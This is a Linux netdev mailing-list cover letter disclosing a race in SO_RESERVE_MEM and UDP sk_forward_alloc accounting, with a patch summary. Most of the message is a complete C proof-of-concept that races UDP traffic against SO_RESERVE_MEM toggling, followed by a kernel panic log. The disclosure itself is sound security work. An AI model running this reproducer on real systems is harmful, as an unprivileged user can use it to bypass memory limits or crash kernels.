Netdev List
 help / color / mirror / Atom feed
* [PATCH net 0/1] net: sock: serialize SO_RESERVE_MEM accounting
@ 2026-09-24  1:55 Ren Wei
  2026-09-24  1:55 ` [PATCH net 1/1] " Ren Wei
  0 siblings, 1 reply; 2+ messages in thread
From: Ren Wei @ 2026-09-24  1:55 UTC (permalink / raw)
  To: netdev
  Cc: edumazet, kuniyu, pabeni, willemb, davem, kuba, horms, weiwan,
	vega, caoruide123, weir

From: Ruide Cao <caoruide123@gmail.com>

Hi Linux kernel maintainers,

We found an issue in net/core/sock.c.

UDP modifies sk_forward_alloc under sk_receive_queue.lock in
__udp_enqueue_schedule_skb() and udp_rmem_release(), while SO_RESERVE_MEM
modifies and reclaims the same non-atomic field under the unrelated socket
lock. Concurrent packet enqueue/dequeue and reservation changes can
therefore lose sk_forward_alloc read-modify-write updates even though
protocol and memcg charges are updated separately. This can create unbacked
allocation credit or strand charges that socket destruction cannot reclaim,
allowing memory-limit bypass or persistent protocol/memcg accounting denial
of service.

Privilege model: unprivileged (non-root) via user and network namespaces.

This change only serializes SO_RESERVE_MEM accounting under the receive-queue
lock already used by UDP receive paths; it does not affect other socket options
or unrelated networking features.

Tested: PoC reproduces the accounting failure in QEMU (2 vCPU / 2 GB); details
and crash evidence are below.

Reproducer:

#!/bin/sh
set -eu

if [ ! -x ./poc ]; then
	make
fi

exec ./poc "$@"


We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment.

------BEGIN PoC------

#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#ifndef SO_MEMINFO
#define SO_MEMINFO 55
#endif

#ifndef SO_RESERVE_MEM
#define SO_RESERVE_MEM 73
#endif

#define PAGE_SZ 4096
#define MEMINFO_WORDS 9

struct meminfo_snapshot {
	uint32_t words[MEMINFO_WORDS];
};

struct run_opts {
	int iterations;
	int runtime_ms;
	int senders;
	int payload;
	int reserve_bytes;
	int rcvbuf_bytes;
};

struct worker_ctx {
	atomic_int *stop;
	int cpu;
	int fd;
	int payload;
	int reserve_bytes;
	unsigned long long ops;
	unsigned long long errors;
	struct sockaddr_in addr;
};

struct run_result {
	int reserved;
	int fwd_alloc;
	int rmem_alloc;
	int wmem_queued;
	int drops;
	long long diff;
	bool violated;
	unsigned long long send_ops;
	unsigned long long recv_ops;
	unsigned long long reserve_ops;
	unsigned long long reserve_errs;
};

static void die_errno(const char *what)
{
	perror(what);
	exit(1);
}

static void pin_cpu(int cpu)
{
	cpu_set_t set;

	CPU_ZERO(&set);
	CPU_SET(cpu % 4, &set);
	if (pthread_setaffinity_np(pthread_self(), sizeof(set), &set) != 0)
		perror("pthread_setaffinity_np");
}

static void sleep_ms(int ms)
{
	struct timespec ts;

	ts.tv_sec = ms / 1000;
	ts.tv_nsec = (long)(ms % 1000) * 1000000L;
	while (nanosleep(&ts, &ts) && errno == EINTR)
		;
}

static int get_int_opt(int fd, int optname)
{
	int val = 0;
	socklen_t len = sizeof(val);

	if (getsockopt(fd, SOL_SOCKET, optname, &val, &len))
		die_errno("getsockopt(int)");
	return val;
}

static struct meminfo_snapshot get_meminfo(int fd)
{
	struct meminfo_snapshot snap;
	socklen_t len = sizeof(snap.words);

	memset(&snap, 0, sizeof(snap));
	if (getsockopt(fd, SOL_SOCKET, SO_MEMINFO, snap.words, &len))
		die_errno("getsockopt(SO_MEMINFO)");
	return snap;
}

static void *sender_thread(void *arg)
{
	struct worker_ctx *ctx = arg;
	char *buf;

	pin_cpu(ctx->cpu);
	buf = malloc(ctx->payload);
	if (!buf)
		die_errno("malloc(sender)");
	memset(buf, 'A', ctx->payload);

	while (!atomic_load_explicit(ctx->stop, memory_order_relaxed)) {
		ssize_t ret = send(ctx->fd, buf, ctx->payload, 0);

		if (ret < 0) {
			if (errno == EINTR)
				continue;
			ctx->errors++;
			continue;
		}
		ctx->ops++;
	}

	free(buf);
	return NULL;
}

static void *receiver_thread(void *arg)
{
	struct worker_ctx *ctx = arg;
	char *buf;

	pin_cpu(ctx->cpu);
	buf = malloc(ctx->payload + 512);
	if (!buf)
		die_errno("malloc(receiver)");

	while (!atomic_load_explicit(ctx->stop, memory_order_relaxed)) {
		ssize_t ret = recv(ctx->fd, buf, ctx->payload + 512, MSG_DONTWAIT);

		if (ret < 0) {
			if (errno == EAGAIN || errno == EWOULDBLOCK)
				continue;
			if (errno == EINTR)
				continue;
			ctx->errors++;
			continue;
		}
		ctx->ops++;
	}

	free(buf);
	return NULL;
}

static void *reserve_thread(void *arg)
{
	struct worker_ctx *ctx = arg;
	int vals[2] = { 0, 0 };
	int idx = 1;

	pin_cpu(ctx->cpu);
	vals[1] = ctx->reserve_bytes;

	while (!atomic_load_explicit(ctx->stop, memory_order_relaxed)) {
		if (setsockopt(ctx->fd, SOL_SOCKET, SO_RESERVE_MEM,
			       &vals[idx], sizeof(vals[idx])) < 0)
			ctx->errors++;
		else
			ctx->ops++;
		idx ^= 1;
	}

	return NULL;
}

static int make_rx_socket(int rcvbuf_bytes, struct sockaddr_in *out_addr)
{
	int fd;
	socklen_t len = sizeof(*out_addr);
	int one = 1;

	fd = socket(AF_INET, SOCK_DGRAM, 0);
	if (fd < 0)
		die_errno("socket(rx)");
	if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)))
		die_errno("setsockopt(SO_REUSEADDR)");
	if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf_bytes,
		       sizeof(rcvbuf_bytes)))
		die_errno("setsockopt(SO_RCVBUF)");

	memset(out_addr, 0, sizeof(*out_addr));
	out_addr->sin_family = AF_INET;
	out_addr->sin_addr.s_addr = htonl(INADDR_LOOPBACK);
	out_addr->sin_port = 0;

	if (bind(fd, (struct sockaddr *)out_addr, sizeof(*out_addr)))
		die_errno("bind(rx)");
	if (getsockname(fd, (struct sockaddr *)out_addr, &len))
		die_errno("getsockname(rx)");
	return fd;
}

static int make_tx_socket(const struct sockaddr_in *addr)
{
	int fd = socket(AF_INET, SOCK_DGRAM, 0);

	if (fd < 0)
		die_errno("socket(tx)");
	if (connect(fd, (const struct sockaddr *)addr, sizeof(*addr)))
		die_errno("connect(tx)");
	return fd;
}

static void drain_socket(int fd, int payload)
{
	char *buf = malloc(payload + 512);

	if (!buf)
		die_errno("malloc(drain)");

	for (;;) {
		ssize_t ret = recv(fd, buf, payload + 512, MSG_DONTWAIT);

		if (ret >= 0)
			continue;
		if (errno == EINTR)
			continue;
		if (errno == EAGAIN || errno == EWOULDBLOCK)
			break;
		die_errno("recv(drain)");
	}

	free(buf);
}

static struct run_result run_once(const struct run_opts *opts)
{
	struct run_result res = { 0 };
	struct sockaddr_in addr;
	struct worker_ctx rx_ctx = { 0 };
	struct worker_ctx reserve_ctx = { 0 };
	struct worker_ctx *tx_ctx;
	pthread_t rx_thr;
	pthread_t reserve_thr;
	pthread_t *tx_thr;
	atomic_int stop = 0;
	struct meminfo_snapshot snap;
	int rx_fd;
	int i;
	int unused_reserved;

	tx_ctx = calloc(opts->senders, sizeof(*tx_ctx));
	tx_thr = calloc(opts->senders, sizeof(*tx_thr));
	if (!tx_ctx || !tx_thr)
		die_errno("calloc");

	rx_fd = make_rx_socket(opts->rcvbuf_bytes, &addr);

	rx_ctx.stop = &stop;
	rx_ctx.cpu = 0;
	rx_ctx.fd = rx_fd;
	rx_ctx.payload = opts->payload;
	if (pthread_create(&rx_thr, NULL, receiver_thread, &rx_ctx))
		die_errno("pthread_create(receiver)");

	reserve_ctx.stop = &stop;
	reserve_ctx.cpu = 1;
	reserve_ctx.fd = rx_fd;
	reserve_ctx.reserve_bytes = opts->reserve_bytes;
	if (pthread_create(&reserve_thr, NULL, reserve_thread, &reserve_ctx))
		die_errno("pthread_create(reserve)");

	for (i = 0; i < opts->senders; i++) {
		tx_ctx[i].stop = &stop;
		tx_ctx[i].cpu = 2 + i;
		tx_ctx[i].fd = make_tx_socket(&addr);
		tx_ctx[i].payload = opts->payload;
		if (pthread_create(&tx_thr[i], NULL, sender_thread, &tx_ctx[i]))
			die_errno("pthread_create(sender)");
	}

	sleep_ms(opts->runtime_ms);

	atomic_store_explicit(&stop, 1, memory_order_relaxed);

	for (i = 0; i < opts->senders; i++) {
		pthread_join(tx_thr[i], NULL);
		close(tx_ctx[i].fd);
		res.send_ops += tx_ctx[i].ops;
	}
	pthread_join(reserve_thr, NULL);
	pthread_join(rx_thr, NULL);

	res.reserve_ops = reserve_ctx.ops;
	res.reserve_errs = reserve_ctx.errors;
	res.recv_ops = rx_ctx.ops;

	drain_socket(rx_fd, opts->payload);
	sleep_ms(50);
	drain_socket(rx_fd, opts->payload);

	res.reserved = get_int_opt(rx_fd, SO_RESERVE_MEM);
	snap = get_meminfo(rx_fd);
	res.rmem_alloc = (int)snap.words[0];
	res.fwd_alloc = (int)(int32_t)snap.words[4];
	res.wmem_queued = (int)snap.words[5];
	res.drops = (int)snap.words[8];

	unused_reserved = res.reserved - res.rmem_alloc - res.wmem_queued;
	if (unused_reserved < 0)
		unused_reserved = 0;

	res.diff = (long long)res.fwd_alloc - unused_reserved;
	res.violated = res.diff < 0 || res.diff >= PAGE_SZ;

	close(rx_fd);
	free(tx_ctx);
	free(tx_thr);
	return res;
}

static void usage(const char *prog)
{
	fprintf(stderr,
		"usage: %s [iterations runtime_ms senders payload reserve_bytes rcvbuf_bytes]\n",
		prog);
	exit(2);
}

int main(int argc, char **argv)
{
	struct run_opts opts = {
		.iterations = 1,
		.runtime_ms = 1000,
		.senders = 2,
		.payload = 8192,
		.reserve_bytes = 1 << 20,
		.rcvbuf_bytes = 1 << 20,
	};
	int i;
	int rc = 1;

	if (argc != 1 && argc != 7)
		usage(argv[0]);
	if (argc == 7) {
		opts.iterations = atoi(argv[1]);
		opts.runtime_ms = atoi(argv[2]);
		opts.senders = atoi(argv[3]);
		opts.payload = atoi(argv[4]);
		opts.reserve_bytes = atoi(argv[5]);
		opts.rcvbuf_bytes = atoi(argv[6]);
	}

	printf("page_size=%d iterations=%d runtime_ms=%d senders=%d payload=%d reserve=%d rcvbuf=%d\n",
	       PAGE_SZ, opts.iterations, opts.runtime_ms, opts.senders,
	       opts.payload, opts.reserve_bytes, opts.rcvbuf_bytes);

	for (i = 0; i < opts.iterations; i++) {
		struct run_result res = run_once(&opts);

		printf("iter=%d reserved=%d rmem=%d fwd=%d wmemq=%d diff=%lld drops=%d send_ops=%llu recv_ops=%llu reserve_ops=%llu reserve_errs=%llu violated=%d\n",
		       i, res.reserved, res.rmem_alloc, res.fwd_alloc,
		       res.wmem_queued, res.diff, res.drops,
		       res.send_ops, res.recv_ops, res.reserve_ops,
		       res.reserve_errs, res.violated);
		fflush(stdout);

		if (res.violated) {
			rc = 0;
			break;
		}
	}

	return rc;
}


------END PoC--------

----BEGIN crash log----

[  235.280631][    C0] Kernel panic - not syncing: kernel: panic_on_warn set ...
[  235.282168][    C0] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.95 #2
[  235.283450][    C0] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  235.285522][    C0] Call Trace:
[  235.286095][    C0]  <IRQ>
[  235.286605][    C0]  panic+0x533/0x610
[  235.287679][    C0]  ? __pfx_panic+0x10/0x10
[  235.288523][    C0]  ? inet_sock_destruct+0x633/0x850
[  235.289436][    C0]  check_panic_on_warn+0x61/0x80
[  235.290166][    C0]  __warn+0xdf/0x2e0
[  235.290730][    C0]  ? inet_sock_destruct+0x633/0x850
[  235.291476][    C0]  report_bug+0x308/0x3d0
[  235.292234][    C0]  handle_bug+0x111/0x150
[  235.292871][    C0]  exc_invalid_op+0x17/0x50
[  235.293520][    C0]  asm_exc_invalid_op+0x1a/0x20
[  235.294190][    C0] RIP: 0010:inet_sock_destruct+0x633/0x850
[  235.295017][    C0] Code: 5d 41 5c 41 5d 41 5e 41 5f e9 59 72 79 f8 90 0f 0b 90 e9 32 fe ff ff 90 0f 0b 90 e9 5f fe ff ff 90 0f 0b 90 e9 d4 fd ff ff 90 <0f> 0b 90 e9 ae fe ff ff e8 50 8a f2 f8 e9 fc fc ff ff 48 89 f7 48
[  235.297675][    C0] RSP: 0018:ffffc90000007da0 EFLAGS: 00010206
[  235.298538][    C0] RAX: 0000000000000e00 RBX: ffff88806311a040 RCX: ffffffff88eb0c7a
[  235.299605][    C0] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffff88806311a2c4
[  235.300693][    C0] RBP: ffffffff8ff715c0 R08: 0000000000000000 R09: ffffed100c62345b
[  235.301771][    C0] R10: ffff88806311a2df R11: 0000000000000000 R12: ffff88806311a068
[  235.302835][    C0] R13: 0000000000000001 R14: ffffffff816be3d1 R15: 0000000000000000
[  235.304284][    C0]  ? rcu_core+0x7b1/0x14b0
[  235.304948][    C0]  ? inet_sock_destruct+0x41a/0x850
[  235.305700][    C0]  ? udp_rmem_release+0x140/0x380
[  235.306427][    C0]  ? rcu_core+0x7b1/0x14b0
[  235.307049][    C0]  __sk_destruct+0x78/0x5f0
[  235.307695][    C0]  ? rcu_core+0x7b1/0x14b0
[  235.308307][    C0]  rcu_core+0x7b3/0x14b0
[  235.308949][    C0]  ? __pfx_rcu_core+0x10/0x10
[  235.309663][    C0]  handle_softirqs+0x2ae/0x8b0
[  235.310362][    C0]  ? __pfx_handle_softirqs+0x10/0x10
[  235.311104][    C0]  ? srso_alias_return_thunk+0x5/0xfbef5
[  235.311908][    C0]  irq_exit_rcu+0xb7/0x120
[  235.312551][    C0]  sysvec_apic_timer_interrupt+0xa3/0xc0
[  235.313327][    C0]  </IRQ>
[  235.313760][    C0]  <TASK>
[  235.314183][    C0]  asm_sysvec_apic_timer_interrupt+0x1a/0x20
[  235.314998][    C0] RIP: 0010:pv_native_safe_halt+0xf/0x20
[  235.315775][    C0] Code: c5 60 02 e9 6e 34 1e 00 0f 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa eb 07 0f 00 2d 03 42 37 00 fb f4 <e9> 47 34 1e 00 66 2e 0f 1f 84 00 00 00 00 00 66 90 90 90 90 90 90
[  235.318358][    C0] RSP: 0018:ffffffff8de07e20 EFLAGS: 00000282
[  235.319179][    C0] RAX: 0000000000132357 RBX: 0000000000000000 RCX: ffffffff8a5222e5
[  235.320247][    C0] RDX: 0000000000000000 RSI: ffffffff8a8c46a0 RDI: ffffffff8aee7960
[  235.321369][    C0] RBP: ffffffff8de95b80 R08: 0000000000000001 R09: ffffed1023147031
[  235.322459][    C0] R10: ffff888118a3818b R11: 0000000000000001 R12: 0000000000000000
[  235.323539][    C0] R13: fffffbfff1bd2b70 R14: 0000000000000000 R15: ffffffff904e92c8
[  235.324824][    C0]  ? ct_kernel_exit+0x125/0x180
[  235.325742][    C0]  default_idle+0x13/0x20
[  235.326541][    C0]  default_idle_call+0x6d/0xb0
[  235.327391][    C0]  do_idle+0x3ca/0x450
[  235.328103][    C0]  ? __pfx_do_idle+0x10/0x10
[  235.328823][    C0]  cpu_startup_entry+0x54/0x60
[  235.329535][    C0]  rest_init+0x14b/0x220
[  235.330119][    C0]  ? srso_alias_return_thunk+0x5/0xfbef5
[  235.330827][    C0]  start_kernel+0x344/0x3e0
[  235.331349][    C0]  x86_64_start_reservations+0x18/0x30
[  235.331945][    C0]  x86_64_start_kernel+0xb2/0xc0
[  235.332500][    C0]  common_startup_64+0x13e/0x148
[  235.333121][    C0]  </TASK>
[  235.335065][    C0] Kernel Offset: disabled
[  235.335717][    C0] Rebooting in 86400 seconds..


-----END crash log-----

Best regards,
Ruide Cao

Ruide Cao (1):
  net: sock: serialize SO_RESERVE_MEM accounting

 net/core/sock.c | 4 ++++
 1 file changed, 4 insertions(+)


base-commit: 24ef02f934eeb48830cff6b739abc3c62b1d107b
-- 
2.47.3


^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2026-09-24  1:55 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-09-24  1:55 [PATCH net 0/1] net: sock: serialize SO_RESERVE_MEM accounting Ren Wei
2026-09-24  1:55 ` [PATCH net 1/1] " Ren Wei

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox